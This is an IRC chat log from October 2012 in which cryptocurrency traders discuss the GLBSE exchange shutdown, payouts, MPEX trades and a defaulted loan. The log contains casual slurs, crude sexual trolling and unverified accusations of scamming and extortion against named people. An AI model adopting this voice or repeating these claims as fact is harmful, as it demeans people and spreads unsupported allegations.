20:39:09 just received this email "Your GLBSE account has been processed for bitcoin. The next step will be to send you information about your assets, and to provide this information to issuers (if you agreed) allowing you to continue your relationship with your issuers." Oct 14 20:39:54 no date or anything ? Oct 14 20:40:02 nope Oct 14 20:41:46 lol you guys got a glbse email too? Oct 14 20:41:57 twhs Oct 14 20:51:42 nope, no email recieved Oct 14 20:51:58 [amsg] guy jumps from space, live now: http://www.redbullstratos.com/live/ Oct 14 20:53:49 [MPEX] [S.MPOE] 1945 @ 0.00040515 = 0.788 BTC [-] Oct 14 20:53:51 [MPEX] [S.MPOE] 37455 @ 0.00040466 = 15.1565 BTC [-] Oct 14 20:53:58 Diablo-D3: that's really cool (I skydive) Oct 14 21:20:01 [MPEX] [S.MPOE] 16145 @ 0.00040466 = 6.5332 BTC [-] Oct 14 21:20:03 [MPEX] [S.MPOE] 18710 @ 0.0004045 = 7.5682 BTC [-] Oct 14 21:45:04 [MPEX] [S.MPOE] 27590 @ 0.0004045 = 11.1602 BTC [-] Oct 14 21:45:05 [MPEX] [S.MPOE] 7610 @ 0.00040447 = 3.078 BTC [-] Oct 14 21:59:40 Diablo-D3: what are your plans if you get the GLBSE shareholders list? Or let me ask this. have issuers agreed on some grand plan of moving to same "place" or something like that? Oct 14 22:00:59 I had like multiple stuff in my "portfolio" and if everyone walk in different direction, this is going to be a real PITA Oct 14 22:03:40 EskimoBob: dmc is shutting down still Oct 14 22:03:48 so... meh Oct 14 22:03:51 theres no way to handle this Oct 14 22:04:15 hrm glbse paid out to me Oct 14 22:04:22 a bunch of tiny amounts then 7.04 Oct 14 22:04:26 wonder what the 7.04 was Oct 14 22:06:48 EskimoBob: anyhow, yeah, it may end up that DMC shares are worth nothing Oct 14 22:07:07 which is going to suck Oct 14 22:12:57 [MPEX] [S.MPOE] 9673 @ 0.00040447 = 3.9124 BTC [-] Oct 14 22:12:58 [MPEX] [S.MPOE] 30983 @ 0.00040444 = 12.5308 BTC [-] Oct 14 22:15:33 .0004? Oct 14 22:16:06 glbse pays and mpex rises, eh? Oct 14 22:16:15 yes, this sucks indeed unless you list them somewhere else. Oct 14 22:16:40 asstes-otc is actually a interesting concept Oct 14 22:16:49 EskimoBob: well, Im going to see if glbse gives me a list of all dmc holders Oct 14 22:17:04 Ill see if I can just buy out all the smallest holders first Oct 14 22:18:11 I think I had some shares left too :) Oct 14 22:22:33 ok, i'm fairly confident that only one of the glbse accounts which I controlled was 'processed' Oct 14 22:22:54 i say this because i only received an email for the one, and not the otheres Oct 14 22:30:36 smickles: did you get a bunch of tx spam though? Oct 14 22:30:45 because I got a bunch of spam Oct 14 22:32:30 interesting, nobody added mpex to stumbleupon yet Oct 14 22:39:29 [MPEX] [S.MPOE] 8800 @ 0.00040444 = 3.5591 BTC [-] Oct 14 22:45:44 Diablo-D3: tx spam? I don't get much spam other that penis pills and the like Oct 14 22:52:29 [MPEX] [O.BTCUSD.C170T] 6 @ 0.01749603 = 0.105 BTC [-] Oct 14 23:14:08 smickles: hurr Oct 14 23:18:05 [MPEX] [S.MPOE] 8317 @ 0.00040444 = 3.3637 BTC [-] Oct 14 23:18:07 [MPEX] [S.MPOE] 42000 @ 0.00040438 = 16.984 BTC [-] Oct 14 23:18:08 [MPEX] [S.MPOE] 7683 @ 0.00040434 = 3.1065 BTC [-] Oct 14 23:26:21 https://bitcointalk.org/index.php?topic=89564.0 <-- ASIC Raffle ONE TIME OFFER (Next Taker Only) - Buy 6 tickets for 1.8 BTC, get 2 free (worth 0.6 BTC) Oct 14 23:32:16 Wrong chat Oct 14 23:33:04 bfl is also doing an asic raffle Oct 14 23:34:59 asic raffle? Oct 14 23:39:38 the winners get them before other asics come out, and 2nd place gets a product close to advertised specs at all ever Oct 14 23:40:02 lol Oct 14 23:42:17 eh Oct 14 23:43:10 [MPEX] [S.MPOE] 1000 @ 0.00040434 = 0.4043 BTC [-] Oct 14 23:52:55 first trade in assets-otc :) Oct 14 23:58:13 ? Oct 15 00:01:31 Diablo-D3: did nefario give out asset lists ? Oct 15 00:01:43 no Oct 15 00:02:42 man, what a tryhard Oct 15 00:08:50 [MPEX] [S.MPOE] 1217 @ 0.00040434 = 0.4921 BTC [-] Oct 15 00:08:51 [MPEX] [S.MPOE] 20257 @ 0.00040404 = 8.1846 BTC [-] Oct 15 00:20:09 Nefario is fuckin up Oct 15 00:20:32 But then again he can never do business in the BTC community again so it's kinda fair Oct 15 00:29:35 i think a few ppl prolly will Oct 15 00:34:07 [MPEX] [S.MPOE] 8043 @ 0.00040404 = 3.2497 BTC [-] Oct 15 00:34:08 [MPEX] [S.MPOE] 34357 @ 0.00040399 = 13.8799 BTC [-] Oct 15 00:55:15 Well, anyone seliing F.GIGA.ETF/S.BVPS? Oct 15 00:57:04 is giga on mpex now? Oct 15 00:59:40 There has always been an ETF Oct 15 01:00:31 [MPEX] [S.MPOE] 22000 @ 0.00040399 = 8.8878 BTC [-] Oct 15 01:00:48 Now, who knows, it may turn into the main site to exchange it, or it may be renderer useless... Oct 15 01:16:38 Indeed Oct 15 01:17:14 I actually purchased 534150 GIGA.ETF already eh Oct 15 01:18:54 rdponticelli: how would it be rendered usless? Oct 15 01:20:06 Well, if for any cause ownership of the underlying can't be acertained Oct 15 01:20:35 Like the useless codes glbse gave to goat... Oct 15 01:21:53 rdponticelli: i wonder if giga would just recognize the etf shares tho Oct 15 01:22:15 That would be great Oct 15 01:22:28 The Owner will never own less shares of the underlying than the total float of this asset implies. Oct 15 01:22:59 mircea_popescu would've broken his own contract to have ever sold those shares Oct 15 01:24:01 speaking of which Oct 15 01:24:04 Yeah, but even if mircea_popescu owns those shares, the proof of that ownership is on glbse's hands Oct 15 01:24:06 how are those etfs even functioning now Oct 15 01:24:45 and i believe giga's signed receipt of the btc for the shares is in the contract too, so it's conceivable that he would honor it w/o any info coming from glbse Oct 15 01:25:17 Diablo-D3: in the way 've just explained it Oct 15 01:25:22 they have a contract Oct 15 01:25:22 smickles: yeah, there's a signed receipt for 900 shares Oct 15 01:25:39 [MPEX] [S.MPOE] 4643 @ 0.00040399 = 1.8757 BTC [-] Oct 15 01:25:40 [MPEX] [S.MPOE] 11557 @ 0.0004035 = 4.6632 BTC [-] Oct 15 01:25:44 Anyway, the float growed later Oct 15 01:26:19 hmm, that complicates things Oct 15 01:26:22 But on last dividend the exchange payed only 3 weeks Oct 15 01:26:58 smickles: I dont understand then Oct 15 01:27:01 So it seems like they were receiving their dividends through glbse Oct 15 01:27:55 mircea said they were paying the rest if/when the issue was solved Oct 15 01:28:26 Diablo-D3: it's possible for giga to honor this arrangement with mircea w/o glbse involvement, so the shares have value Oct 15 01:28:36 we'll se what actually happens tho Oct 15 01:28:38 smickles: did mircea buy them directly from giga? Oct 15 01:29:36 Diablo-D3: i dunno, but in this possibility, he could've bought them on glbse Oct 15 01:29:48 heh Oct 15 01:29:50 well, I cant do the same Oct 15 01:30:01 I cant honor any of the dmc shares left out there until glbse hands over the data =/ Oct 15 01:30:48 yeah, those etf shares are unique to this kerfuflle Oct 15 01:31:51 I wonder if I should just write off 800 btc and pretend it never existed Oct 15 01:31:58 it would save a lot of trouble =/ Oct 15 01:33:36 Maybe we just should pretend bitcoin itself never existed... Oct 15 01:33:48 No more trouble :) Oct 15 01:34:09 and for that matter ... Oct 15 01:34:14 But no more fun :( Oct 15 01:34:28 rdponticelli: honestly, Im thinking about it Oct 15 01:34:29 huh, what were we talking about? Oct 15 01:35:11 Diablo-D3: you aren't quitting bitcoin, right? Oct 15 01:35:30 rdponticelli: I dont know. Oct 15 01:35:39 I cant say the effort I put into it has been worth it. Oct 15 01:35:41 Diablo-D3: write it off! Oct 15 01:35:47 Diablo-D3: that's what zynga did Oct 15 01:36:44 why does every p2pool block show up in the blockchain.info 'strange transactions' page? Oct 15 01:37:08 blockchain.info doesnt like gen tx spam Oct 15 01:37:13 surprised other pools dont pop up in it too Oct 15 01:38:08 00:28.41 ( Diablo-D3 ) smickles: did mircea buy them directly from giga? Oct 15 01:38:10 yup Oct 15 01:38:23 kakobrekla: thats why he can verify them, I guess Oct 15 01:38:40 well, kakobrekla, by your word, then the etf should be in good shape Oct 15 01:38:53 so giga is on mpex now? Oct 15 01:38:56 he said he is getting paid directly Oct 15 01:39:08 thestringpuller: not exactly, Oct 15 01:39:30 kakobrekla: but last dividends, he paid only for 3 weeks Oct 15 01:39:32 there has for some time been something like a depositary receipt of gigaminin on mpex Oct 15 01:40:05 And said the rest would be paid out if/when the issues got solved Oct 15 01:40:19 maybe giga is holding everything back? Oct 15 01:40:53 I don't know... he was concerned about legal stuff too... Oct 15 01:41:36 well mps words are "i pay what giga pays [directly to me]" Oct 15 01:46:03 dam, now this is a ToS http://www.hashpower.com/?page=terms Oct 15 01:47:45 ;;bc,diff Oct 15 01:47:47 3054627.5269486 Oct 15 01:50:25 kakobrekla: those were mircea's words, on dividend day: Oct 15 01:50:29 [09:53:54] [MPEX] [F.GIGA.ETF] [PAID] 1000000 @ 0.00003459 = 34.58804 BTC Oct 15 01:50:29 [09:55:38] that's three weeks that were actually paid. if/when giga manages to sort out the glbbq mess there'll be more. Oct 15 01:51:34 im guessing he is not doing a partial payment http://gigamining.com/ Oct 15 01:51:54 [MPEX] [S.MPOE] 52300 @ 0.00040404 = 21.1313 BTC [+] Oct 15 02:18:21 [MPEX] [S.MPOE] 7100 @ 0.00040352 = 2.865 BTC [-] Oct 15 02:18:23 [MPEX] [S.MPOE] 18700 @ 0.00040476 = 7.569 BTC [+] Oct 15 02:43:41 [MPEX] [S.MPOE] 7800 @ 0.00040476 = 3.1571 BTC [+] Oct 15 02:43:43 [MPEX] [S.MPOE] 17200 @ 0.00040522 = 6.9698 BTC [+] Oct 15 02:49:16 ;;seen usagi Oct 15 02:49:17 usagi was last seen in #bitcoin-assets 1 week, 2 days, 16 hours, 35 minutes, and 35 seconds ago: We own 2000 shares.. should be good if glbse comes up :/ Oct 15 02:59:58 ;;getrating usagi Oct 15 02:59:59 WARNING: Currently not authenticated. User Usagi, rated since Mon Jun 18 09:33:55 2012. Cumulative rating 43, from 28 total ratings. Received ratings: 27 positive, 1 negative. Sent ratings: 32 positive, 2 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=Usagi Oct 15 03:00:40 ;;rated usagi Oct 15 03:00:41 You rated user usagi on Mon Sep 17 19:56:21 2012, giving him a rating of 1, and supplied these additional notes: I have made a limited arangement with ~. we'll se how it goes. Oct 15 03:02:02 ;;rate usagi -1 I have made a limited arangement with ~. we'll se how it goes. ~ is now late in paying and will have defaulted on the contract by the end of tody if action is not taken. Oct 15 03:02:03 Rating entry successful. Your rating for user usagi has changed from 1 to -1. Oct 15 03:03:48 well, really 'today' was over 3 min ago Oct 15 03:04:04 but i'll give usagi until today is over in arizona time Oct 15 03:04:23 smickles: lol, you liked my ToS ? :P Oct 15 03:04:53 What kind of arrangement? Oct 15 03:05:03 Ukto: it's entertaining, at least :) Oct 15 03:05:15 Usagi better reappear pretty soon. Oct 15 03:05:25 BTC-Mining: a loan from s²cm to cpa Oct 15 03:05:46 smickles: I just wanted to be very clear about things up front. :P Oct 15 03:05:51 eh... well with GLBSE having the funds, you know... Oct 15 03:06:07 BTC-Mining: glbse paid back funds today Oct 15 03:06:23 Not for everyone as far as I know Oct 15 03:06:33 at least it's not fully completed Oct 15 03:06:51 ah, well, also, usagi claimed to have the funds to pay on this contract even after glbse went down Oct 15 03:06:57 and mad a payment too, iirc Oct 15 03:07:13 oh Oct 15 03:07:27 So... what is he doing, not showing up? Oct 15 03:07:51 Who will I pay for all those BTC-Mining shares he held in BMF? Oct 15 03:08:01 i sent off an email just a moment ago Oct 15 03:08:21 today is the last day of a late payment date range Oct 15 03:08:50 and I haven't seen/heardfrom usagi for about a week Oct 15 03:09:14 ... Oct 15 03:09:35 BTC-Mining: want to see the contract? curious? Oct 15 03:10:05 Nah, I'm sure it exists and the exact terms are not really of interest. Oct 15 03:10:13 [MPEX] [S.MPOE] 200 @ 0.00040522 = 0.081 BTC [+] Oct 15 03:10:14 [MPEX] [S.MPOE] 3200 @ 0.00040572 = 1.2983 BTC [+] Oct 15 03:10:16 [MPEX] [S.MPOE] 21700 @ 0.00040592 = 8.8085 BTC [+] Oct 15 03:10:39 Well, I might have just earned a few thousands at the expense of BMF's investors -.- Oct 15 03:11:16 wonder when nef. will give out asset lists Oct 15 03:11:19 *if Oct 15 03:11:44 BTC-Mining: if i have proof that usagi owes me btc, and you have btc owed to usagi... would you mind sending it on to me :) Oct 15 03:12:46 I don't know how much shares he had. But I suppose if he signed it with his gpg key, I could indeed pay interests to you for his debt. Oct 15 03:14:12 BTC-Mining: it's signed alright ;) well wait to see if he defaults in arizona time, instead of UTC tho, give a little wiggleroom Oct 15 03:20:42 if anyone is curious, i've decided to post the contract on bitbin Oct 15 03:20:43 http://bitbin.it/nPDQRLME Oct 15 03:22:16 oh, usagi is about https://bitcointalk.org/index.php?topic=114820.msg1271570#msg1271570 Oct 15 03:22:25 that was about 7 hrs ago Oct 15 03:22:38 I wonder how hes doing Oct 15 03:23:43 usagi is hurting bad Oct 15 03:23:46 not good if he can't make an ~11 btc payment Oct 15 03:23:51 Nyan is pretty much fucked Oct 15 03:25:17 so Oct 15 03:25:39 so Oct 15 03:26:09 I dont know =/ Oct 15 03:30:47 "Lol just fuck off dude. You got nothing, and the best you can do is necroaccount and necrothread." Oct 15 03:31:11 Wow... do I need to pick up Usagi's GLBSE account now or what? Oct 15 03:31:51 Usagi has lost his mind. Oct 15 03:31:58 BTC-Mining: awesome, eh? as he was about 7 hours (if we're using utc time) away from defaulting on a contract Oct 15 03:32:21 smickles: is he late? Oct 15 03:32:49 not only late, thestringpuller, but outside of the late payment clause Oct 15 03:32:52 thestringpuller: http://bitbin.it/nPDQRLME Oct 15 03:33:07 check blockchain.info for the payment dates Oct 15 03:33:11 okay Oct 15 03:34:55 smickles: daaaaamn Oct 15 03:35:09 So he's in default? Oct 15 03:36:23 thestringpuller: depends on what timezone we're using Oct 15 03:36:23 [MPEX] [S.MPOE] 1500 @ 0.00040469 = 0.607 BTC [-] Oct 15 03:36:41 if UTC, then yes Oct 15 03:37:06 i know usagi works in japan Oct 15 03:37:13 so maybe not utc? Oct 15 03:37:26 I feel a little bad for him. CPA was a pretty neat company. Oct 15 03:39:46 if we go by jst, then he has about 8 hours to make an (approx.) 11 btc payment to hold off default, but remain late on todays payment Oct 15 03:42:39 Dude the btc economy is tanking Oct 15 03:42:57 looking at mtgox live just makes me sad Oct 15 03:44:11 http://sphotos-a.xx.fbcdn.net/hphotos-ash4/384355_4066797863173_618082375_n.jpg Oct 15 03:44:34 what the heck are you talking about, thestringpuller? Oct 15 03:44:44 Diablo-D3: :D Oct 15 03:44:50 lol Oct 15 03:45:05 BTC-Mining: probably the declining volume over time Oct 15 03:45:07 yea Oct 15 03:45:13 declining volume over time Oct 15 03:45:15 lol Oct 15 03:45:28 I thought we were in the clear and it would stabilize at 12 USD Oct 15 03:45:32 but nope Oct 15 03:45:38 still on the rollercoaster Oct 15 03:45:42 ;;ticker Oct 15 03:45:43 Best bid: 11.7122, Best ask: 11.75268, Bid-ask spread: 0.04048, Last trade: 11.79, 24 hour volume: 23280, 24 hour low: 11.496, 24 hour high: 12.03 Oct 15 03:45:48 going back to 2 P Oct 15 03:45:50 ;;bc,24hprc Oct 15 03:45:51 11.82 Oct 15 03:45:54 seems pretty minor Oct 15 03:45:59 of a drop Oct 15 03:46:08 just someone dropping a lot of BTC Oct 15 03:46:14 wow, .1 usd off of the 24 hour weighted average? Oct 15 03:46:14 in comparison to pirate's default or the gawker bubble Oct 15 03:46:46 nefario is dumping :D Oct 15 03:46:50 XD Oct 15 03:47:26 Nefario actually paid out =/ Oct 15 03:47:42 no he didnt Oct 15 03:47:51 lol, i mean, it's likely nefario has/had more btc than I do, but damn, i'm sure he's a small fish Oct 15 03:48:01 I got paid my account in full Oct 15 03:48:12 and there's many other people claiming to have been paid =/ Oct 15 03:48:15 1 of 3 of my accounts was paid Oct 15 03:48:37 nobody is claiming he restored the former value of their shares Oct 15 03:48:52 yeah, I was strictly talking of balances Oct 15 03:48:53 does any sane person expect that? Oct 15 03:49:18 he hasn't released information to the issuers yet... Oct 15 03:49:30 also why isn't the SEC going after MPEX? Oct 15 03:49:35 hes bl;ackmailing the BG partners over it Oct 15 03:50:24 thestringpuller: mpex falls under the romainian version of the sec, if at all Oct 15 03:50:25 unless he basically gets everything thats left over after the payouts he wont release the asset details Oct 15 03:50:42 the SEC has no freaking jurisdiction around the whole freaking globe Oct 15 03:50:47 thestringpuller: those romainian lawyers see bitcoin as WOW gold Oct 15 03:50:50 ie extortion Oct 15 03:51:14 smickles: as long as these 'sane' people aren't also congratulating nefario on handling this in the best way possible Oct 15 03:51:15 and the mpex securities as part of a computer game Oct 15 03:51:42 dub: that sort of 'sane' person would be an asshat Oct 15 03:51:58 Can people stop talking about the SEC like it was some global organisation? Oct 15 03:52:06 It's US only Oct 15 03:52:13 Just like the CIA is US only :P Oct 15 03:52:14 theres basically no way to cut it that doesnt paint nefario is a moronic scammer Oct 15 03:53:20 https://www.youtube.com/watch?v=rboByPlU4IM Oct 15 03:53:34 Well, unless someone proves me he's been blackmailing, I can only know for sure that he's a poor decision maker. Oct 15 03:53:36 o hallo. Oct 15 03:53:39 whats Oct 15 03:53:42 new ? Oct 15 03:54:31 EskimoBob explain this cool concept of assets-otc. Oct 15 03:55:23 mircea_popescu: new: http://bitbin.it/nPDQRLME (but not exactly glbse) Oct 15 03:55:40 Diablo-D3: that's a funny video Oct 15 03:55:58 mircea_popescu: < noagendamarket> unless he [nefario] basically gets everything thats left over after the payouts he wont release the asset details Oct 15 03:56:11 rdponticelli the float growed a little, but it wasn't ever much more than 1.2-1.3k or so. Oct 15 03:56:20 and at the time glbse went bust it was ~1.08k iirc Oct 15 03:56:28 smickles: did CPA need to make payouts at some point? is that what the loan was for? Oct 15 03:56:34 mircea_popescu: yes, I know Oct 15 03:57:03 pigeons: depending on the timezone you use, usagi/cpa is about to or has just recently defaulted Oct 15 03:57:05 kakobrekla that buy was pre-glbse ipo, giga delivered shares on glbse, it's not a private agreement in any way. Oct 15 03:57:08 And is allowed by the contract, as long as you have the backinv Oct 15 03:57:50 Usagi borrowed coins to pump and dump BMA lol Oct 15 03:57:51 pigeons: "3. Payments will be made each Sunday until six payments have been made. Oct 15 03:57:54 " Oct 15 03:57:59 smickles: yeah i was wondering what cpa's purpose was for the original loan. did they use it to pay something they insured?? Oct 15 03:58:34 its one thing for usagi to be a tool, its another that he got mad when people pointed it out Oct 15 03:58:45 pigeons: oh, i think it may have been used to buy back shares of something or other Oct 15 03:58:56 but that would be a speculative statement Oct 15 03:59:06 well good luck with recovery Oct 15 03:59:11 ah mircea_popescu, so you are glbse dependend... sorry then, i was sure you werent. Oct 15 03:59:19 usagi bouhgt back his own personal shares :P Oct 15 04:00:53 well usagi is concentrating on paying rent Oct 15 04:01:03 he borrowed against his salary Oct 15 04:01:22 s/he Oct 15 04:02:01 oh man Oct 15 04:02:01 unless he basically gets everything thats left over after the payouts he wont release the asset details <<< and to think you've been an ass all over the forum @ the girl. Oct 15 04:02:43 [MPEX] [S.MPOE] 31800 @ 0.0004035 = 12.8313 BTC [-] Oct 15 04:02:46 meh Oct 15 04:03:02 pigeons: if he knew that he couldn't pay, then he should've at least contacted me to work something out Oct 15 04:03:15 pigeons i was just reading that, didn't know they're leaking it out now. Oct 15 04:03:19 is gox fucked? Oct 15 04:03:29 smickles: absolutely. i'm not excusing shim Oct 15 04:03:39 shim :) Oct 15 04:03:42 lol Oct 15 04:03:44 kakobrekla inasmuch as the giga holdings, i was. guy wouldn't keep it private, what can i tell you. Oct 15 04:03:46 lol Oct 15 04:03:47 not like i didn't suggest it. Oct 15 04:04:17 why is gox fucked ?! Oct 15 04:04:18 ;;ticker Oct 15 04:04:19 Best bid: 11.57411, Best ask: 11.5999, Bid-ask spread: 0.02579, Last trade: 11.57411, 24 hour volume: 23229, 24 hour low: 11.496, 24 hour high: 12.03 Oct 15 04:04:22 meh. Oct 15 04:04:42 slow loads, ajax faggotry broken Oct 15 04:05:11 that's periodic with them neh ? Oct 15 04:05:47 oh jeez, i don't recall if i was long or short with my option position :o Oct 15 04:05:55 possibly the shitcocks operating my corp network Oct 15 04:05:55 FUCK Oct 15 04:06:07 gox is plummeting Oct 15 04:06:30 ;;ticker Oct 15 04:06:31 Best bid: 11.57411, Best ask: 11.5998, Bid-ask spread: 0.02569, Last trade: 11.57419, 24 hour volume: 23239, 24 hour low: 11.496, 24 hour high: 12.03 Oct 15 04:06:33 FUCK SELL ALL THE COINS Oct 15 04:06:34 not that bad $11.50-6- Oct 15 04:06:39 wtf lol. Oct 15 04:06:42 I also complained about "the girl", not for believing that GLBSE was a scam (She's free to believe whatever she wants) but for supporting her claims with unfounded statements and speculations which were false and presented as established facts. Oct 15 04:06:51 thestringpuller: first week in bitcoin eh? Oct 15 04:07:12 I'd think so... Oct 15 04:07:13 dub: no I just didn't think the damage done by GLBSE would reach this far Oct 15 04:07:27 I was thinking stability at around 11.98 Oct 15 04:07:31 its gonna get worse Oct 15 04:07:32 thestringpuller: I'd suggest its not, this is a tiny movement Oct 15 04:07:45 That's a very minor movement Oct 15 04:07:52 pretty meaningless Oct 15 04:07:53 Check the 1 month chart on GLBSE Oct 15 04:08:07 BTC-Mining on one hand that's a gross exaggeration, on the other there's little similarity between you and the bitcoin.me fellow. Oct 15 04:08:24 BTC-Mining: who is "the girl" sounds like a spy Oct 15 04:08:37 MPEx's PR person Oct 15 04:08:44 "the girl" is what mircea_popescu calls himself when we talk on skype Oct 15 04:08:49 Conveniently known as MPOE-PR Oct 15 04:08:50 lol Oct 15 04:08:56 LOL Oct 15 04:09:06 s/he Oct 15 04:09:09 https://encrypted.google.com/search?q=how+long+until+the+end+of+the+world Oct 15 04:09:10 the real question is, where is the uncropped avatar pic Oct 15 04:09:11 AAAAAAAAAAAAARGH Oct 15 04:09:12 another shim Oct 15 04:09:32 why are there so many traps in bitcoinland ? Oct 15 04:09:42 :P Oct 15 04:09:45 pigeons we talk on skype !? Oct 15 04:10:16 Diablo-D3: that'll e why nefario closed glbse.. Oct 15 04:10:19 the MPOE avatar is cropped so you cant see its penis Oct 15 04:10:24 be* Oct 15 04:10:34 lol Oct 15 04:10:38 noagendamarket: exactly, NEEDS MOAR PENIX Oct 15 04:10:42 skype/adultfriendfinder/chatroulette/whatever Oct 15 04:10:49 why are you all such fags Oct 15 04:10:59 mircea_popescu: internet Oct 15 04:11:03 o right. Oct 15 04:11:10 too much /b/ Oct 15 04:11:11 carry onwards. Oct 15 04:11:17 BTC-Mining on one hand that's a gross exaggeration Oct 15 04:12:03 MPOE-PR is an illusion... Oct 15 04:12:04 hmm Oct 15 04:12:06 What? She claimed among other things, for example, that Usagi was appointed by Nefario to manage a review panel deciding on what would or would not be allowed on GLBSE. Oct 15 04:12:23 hey baby Oct 15 04:12:28 BTC-Mining that's afaik the only thing she said that you actually disputed, and you disputed it by your own testimony. Oct 15 04:12:44 re-read your statement above, compare with "1 case where i personally don't agree with what she said". it doesn't wash. Oct 15 04:12:46 what's up, hot stuff *kisu kisu* Oct 15 04:12:59 asl? Oct 15 04:13:10 jesica = jcpham ? Oct 15 04:13:11 yeah, but her posting history if full of such contested facts which she eventually admits she doesn't actually know if they're true or not. Oct 15 04:13:20 BTC-Mining links. Oct 15 04:13:23 19/f/romanistan Oct 15 04:13:33 greatest country in the world Oct 15 04:13:41 murica? Oct 15 04:13:42 https://www.wolframalpha.com/input/?i=how%20long%20until%20the%20end%20of%20the%20world Oct 15 04:13:43 is that where all the gypsies are ? Oct 15 04:13:45 *phew* Oct 15 04:13:48 my sister is #1 prostiture in all of romanistan Oct 15 04:13:55 She claimed among other things, for example, that Usagi was appointed by Nefario to manage a review panel deciding on what would or would not be allowed on GLBSE."" << i know that claim to be tru and have email logs of the pannel Oct 15 04:13:55 arf, I don't want to browse her history again. But next time I see one, I'll report it to you if you want Oct 15 04:14:17 BTC-Mining lol actually, i think if i dig in the logs i can find usagi making the exact claim. Oct 15 04:14:21 wait Oct 15 04:14:27 did someone just claim they're 19 and female? Oct 15 04:14:36 then again you can prolly find usagi making any claim you arbitrarily want to check for. Oct 15 04:14:38 ;) Oct 15 04:14:46 damnit smickles Oct 15 04:14:53 lol it was smix ?! omg. Oct 15 04:15:04 total troll, whodda thunk it. he looks so prim and proper... Oct 15 04:15:16 usagi sound controversial... Oct 15 04:15:19 sounds* Oct 15 04:15:28 well he seemed ok for a while but then turned complete bonkerette. Oct 15 04:15:38 which is like tourette except with stupidcrazy. Oct 15 04:15:52 True, she based her fact on something Usagi claimed... Oct 15 04:15:58 given enough time, the controversial rate of any bitcoiner goes to 1 Oct 15 04:16:04 [MPEX] [S.DICE] 7800 @ 0.0032 = 24.96 BTC [-] Oct 15 04:16:06 [MPEX] [S.DICE] 67200 @ 0.00337 = 226.464 BTC [+] Oct 15 04:16:17 but Usagi... is that really a source? Oct 15 04:16:32 USAGI LIESSSS Oct 15 04:16:34 well he'd have been a party you know ? Oct 15 04:16:36 BTC-Mining: is this about that pannel existing? Oct 15 04:16:39 actually, if usagi is supposed to be a japanese princess Oct 15 04:16:49 fuck can keep track of it all, but it hardly amounts to what you're making out of it i think. Oct 15 04:17:04 you'd think we could get a statement from a professional tentacle deamon on this Oct 15 04:17:11 LOL Oct 15 04:17:13 ahaha Diablo-D3 wins interwebs Oct 15 04:17:17 No, about Usagi managing said panel and panel having authority to determine if assets were to be listed or not. Oct 15 04:17:35 but wait. as to the later part : what else was it a panel for ? masturbatory onanism ? Oct 15 04:17:43 He never was appointed by Nefario or given any decisive power Oct 15 04:17:44 wait, you mean usagi isnt a samurai rabbit? Oct 15 04:17:51 XD Oct 15 04:17:56 dub: NO, oh GOD, NO! Oct 15 04:17:58 usagi said there was going to be a panel and the glbse board signed off on it Oct 15 04:18:05 nefario and usagi both said a few lies about that Oct 15 04:18:11 no there wasnt :P Oct 15 04:18:30 As far as I know, there never was such a thing. Usagi proposed it and Nefario was considering. Oct 15 04:18:30 no, nefario actually was repeating what usagi said Oct 15 04:18:34 and then suddenly denied it Oct 15 04:18:43 Yeah, something like that Oct 15 04:18:45 Nefario says a lot of things that are out there Oct 15 04:18:58 so Im not sure who was lying Oct 15 04:19:03 On the other hand mircea_popescu Oct 15 04:19:07 BTC-Mining the problem with nefario's statements is that he often contradicts what he pretended last time Oct 15 04:19:08 such as "your fake shares are real" Oct 15 04:19:12 LOL Oct 15 04:19:18 i tend to recall this ridiculous Ven thing being a bluechip asset. Oct 15 04:19:25 yes it was Oct 15 04:19:27 heh, BTC-Mining have you seen the founding post of that group? Oct 15 04:19:33 noagendamarket: or "dmc will be shut down, diablo will go to bitcoin prison, and we'll get down to the truth" Oct 15 04:19:41 and then he discovered the truth and didnt quite like it. Oct 15 04:19:42 I also seem to have killed a scam accusation against MPEx Oct 15 04:20:05 did usagi get tagged in the end? Oct 15 04:20:06 oh ? Oct 15 04:20:06 https://bitcointalk.org/index.php?topic=102333.msg1249202#msg1249202 Oct 15 04:20:33 o yea, that. good point actually. Oct 15 04:20:59 i guess it wasn't immediately obvious to people that as long as they keep the deposit slip they can prove depositing Oct 15 04:21:22 in truth, much of the beauty of gpg is lost on the avg internet user. Oct 15 04:21:32 I must admit I don't really keep them =/ Oct 15 04:21:45 lol Jonathan ERyan owens doesnt even have a scammer tag and Nefario does Oct 15 04:22:00 After he stole 9000 bitcoins :D Oct 15 04:22:10 neither does kludge, nor that tradehill guy Oct 15 04:22:11 w/e his name is Oct 15 04:22:15 mckenna Oct 15 04:22:20 whatever happened to tradehill Oct 15 04:22:22 But yeah, if I wanted to keep them/have a proof, it's all there Oct 15 04:22:25 http://bitbin.it/9d8MqgBV Oct 15 04:22:26 .title Oct 15 04:22:27 smickles: GLBSE Asset Review Board - BitBin Oct 15 04:22:33 well JRO and the tradehilol guy are working together Oct 15 04:23:07 noagendamarket yes, at real estate development. with money. that they...umm... had. Oct 15 04:23:09 all along. Oct 15 04:23:09 what i posted there are the exact words describing the glbse pannel usagi used Oct 15 04:23:11 yeah but no more scamming for them, now it's real estate ;) Oct 15 04:23:39 Yeah, it ended up being a suggestion only panel, not decision making panel. Oct 15 04:23:43 LOL im waiting for them to hire bruce Oct 15 04:23:45 thestringpuller well they claimed that dwolla stole their money and closed. Oct 15 04:23:54 wagner Oct 15 04:23:54 And Nefario never actually gave Usagi management of the panel list Oct 15 04:23:55 its still unclear how much money they made off with tho. Oct 15 04:24:10 BTC-Mining: yeah, that was lol, wasn't it Oct 15 04:24:13 man den of thieves... Oct 15 04:24:17 Nefario wont take suggestions from hisown shareholders ffs Oct 15 04:24:20 people need to manage their businesses better Oct 15 04:24:24 maybe tghey just hire ed, and bruce starts shittalking them. Oct 15 04:25:00 [MPEX] [S.MPOE] 54900 @ 0.00040367 = 22.1615 BTC [+] Oct 15 04:25:01 [MPEX] [S.MPOE] 10013 @ 0.00040592 = 4.0645 BTC [+] Oct 15 04:25:02 [MPEX] [S.MPOE] 46200 @ 0.00040612 = 18.7627 BTC [+] Oct 15 04:25:03 [MPEX] [S.MPOE] 10896 @ 0.00040617 = 4.4256 BTC [+] Oct 15 04:25:04 besides, is bruce wagner even his real name ? iirc it was some famous guy in thr 50s Oct 15 04:25:04 [MPEX] [S.MPOE] 61400 @ 0.00040651 = 24.9597 BTC [+] Oct 15 04:25:05 [MPEX] [S.MPOE] 30700 @ 0.00040804 = 12.5268 BTC [+] Oct 15 04:25:06 [MPEX] [S.MPOE] 20548 @ 0.00040869 = 8.3978 BTC [+] Oct 15 04:25:07 [MPEX] [S.MPOE] 45298 @ 0.00040916 = 18.5341 